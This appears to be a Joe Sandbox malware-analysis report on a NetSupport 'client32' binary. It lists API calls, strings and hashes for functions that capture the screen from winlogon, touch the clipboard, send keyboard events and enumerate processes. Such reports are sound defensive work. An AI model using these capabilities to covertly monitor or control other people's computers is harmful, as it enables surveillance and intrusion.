                                                                              APIs
                                                                              • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                              • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                              • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$BringCurrentIconicShowThread
                                                                              • String ID:
                                                                              • API String ID: 4184413098-0
                                                                              • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                              • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                              Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                              • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ControlDevicekeybd_event
                                                                              • String ID:
                                                                              • API String ID: 1421710848-0
                                                                              • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                              • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                              Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                              • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$DataFormatName
                                                                              • String ID:
                                                                              • API String ID: 3172747766-0
                                                                              • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                              • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                              • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                              • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                              Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                              • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                              • API String ID: 2942389153-3574733319
                                                                              • Opcode ID: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                              • Opcode Fuzzy Hash: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                              Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                              • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                              • GetDC.USER32(00000000), ref: 110B31E8
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                              • GetTickCount.KERNEL32 ref: 110B323F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                              • GetTickCount.KERNEL32 ref: 110B327F
                                                                              • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                              • GdiFlush.GDI32 ref: 110B32A2
                                                                              • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                              • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                              • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                              • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                              • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                              • API String ID: 2071925733-2101319552
                                                                              • Opcode ID: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                              • Opcode Fuzzy Hash: 69ccdf57648ba78fab6be258752d8ad5ba147c4fba19d096890e8e9156bf9cf5
                                                                              • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                              Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E950: __itow.LIBCMT ref: 1105E975
                                                                              • GetObjectA.GDI32(?,0000003C,?), ref: 110054E5
                                                                                • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                              • wsprintfA.USER32 ref: 1100553D
                                                                              • DeleteObject.GDI32(?), ref: 11005592
                                                                              • DeleteObject.GDI32(?), ref: 1100559B
                                                                              • SelectObject.GDI32(?,?), ref: 110055B2
                                                                              • DeleteObject.GDI32(?), ref: 110055B8
                                                                              • DeleteDC.GDI32(?), ref: 110055BE
                                                                              • SelectObject.GDI32(?,?), ref: 110055CF
                                                                              • DeleteObject.GDI32(?), ref: 110055D8
                                                                              • DeleteDC.GDI32(?), ref: 110055DE
                                                                              • DeleteObject.GDI32(?), ref: 110055EF
                                                                              • DeleteObject.GDI32(?), ref: 1100561A
                                                                              • DeleteObject.GDI32(?), ref: 11005638
                                                                              • DeleteObject.GDI32(?), ref: 11005641
                                                                              • ShowWindow.USER32(?,00000009), ref: 1100566F
                                                                              • PostQuitMessage.USER32(00000000), ref: 11005677
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                              • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                              • API String ID: 2789700732-770455996
                                                                              • Opcode ID: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                              • Instruction ID: fd76b8300a222304a99732cac27ba94327f80de35dfbaf81c148901aa75ffadf
                                                                              • Opcode Fuzzy Hash: 5643fefa4b39ee0fff75ee309dbb4bc87683bc06c1bf1752bbaaaa7d6b9440ae
                                                                              • Instruction Fuzzy Hash: 24813775600609AFD368DBA5CD91EABF7F9BF8C704F00494DE5AAA7241CA74F801CB60
                                                                              Function 11107050 Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 304libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,EE49F673,00000002,11030250,?,00000000,1118A896,000000FF,?,1110809F,00000000,?,11030250,00000000,00000000), ref: 1110708D
                                                                                • Part of subcall function 11138260: GetVersion.KERNEL32(00000000,75920BD0,00000000), ref: 11138283
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 111382A4
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 111382B4
                                                                                • Part of subcall function 11138260: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111382D1
                                                                                • Part of subcall function 11138260: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111382DD
                                                                                • Part of subcall function 11138260: _memset.LIBCMT ref: 111382F7
                                                                              • FreeLibrary.KERNEL32(00000000,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 111070DF
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,1110809F,00000000,?,11030250,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF), ref: 11107116
                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 111071A0
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 111071F1
                                                                              • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 1110726A
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 1110728C
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072A3
                                                                              • SetLastError.KERNEL32(00000078,?,1110809F), ref: 111072B0
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1110809F), ref: 111072D0
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000104,?,1110809F), ref: 11107446
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00000000,?,00000104,?,1110809F), ref: 11107360
                                                                              • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,00000000,?,00000104,?,1110809F), ref: 1110738F
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000104,?,1110809F), ref: 1110743F
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,1110809F), ref: 111074CC
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,1110809F), ref: 111074D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Handle$ErrorFreeLastProcess$CloseLoadModuleOpenToken$FileImageInformationNameVersion_memset_strrchr
                                                                              • String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$WTSGetActiveConsoleSessionId$dwm.exe$psapi.dll$winlogon.exe
                                                                              • API String ID: 348974188-2591373181
                                                                              • Opcode ID: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction ID: c6fb8941b728de1d874c8cf5bae9c94d2d097e9c1a5b8d4b24900e8511d45065
                                                                              • Opcode Fuzzy Hash: 2b78c885ca7092d50f7b3971725b2a7c7ff69b286f2b648b2b9de1ef00c0ff8f
                                                                              • Instruction Fuzzy Hash: A2C17DB1D0066A9FDB22DF658D846ADFAB8BB09314F4141FAE65CE7280D7309B84CF51
                                                                              Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,-00000007), ref: 1105D277
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
                                                                              • GetDC.USER32(00000000), ref: 1105D2BB
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1105D300
                                                                              • GetTickCount.KERNEL32 ref: 1105D30F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
                                                                              • GetTickCount.KERNEL32 ref: 1105D33C
                                                                              • GetLastError.KERNEL32(?), ref: 1105D348
                                                                              • GdiFlush.GDI32 ref: 1105D35C
                                                                              • SelectObject.GDI32(00000000,?), ref: 1105D367
                                                                              • DeleteObject.GDI32(00000000), ref: 1105D36E
                                                                              • DeleteDC.GDI32(00000000), ref: 1105D378
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 1105D384
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1105D396
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
                                                                              • String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
                                                                              • API String ID: 652520247-4094952007
                                                                              • Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
                                                                              • Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
                                                                              • Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1
                                                                              Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A
                                                                                • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                              • wsprintfA.USER32 ref: 1102B84D
                                                                                • Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32(0002001F,?,?,0002001F,?,?,0002001F,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,1102B625), ref: 110ED926
                                                                              • FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
                                                                              • wsprintfA.USER32 ref: 1102B69E
                                                                              • wsprintfA.USER32 ref: 1102B705
                                                                                • Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
                                                                                • Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
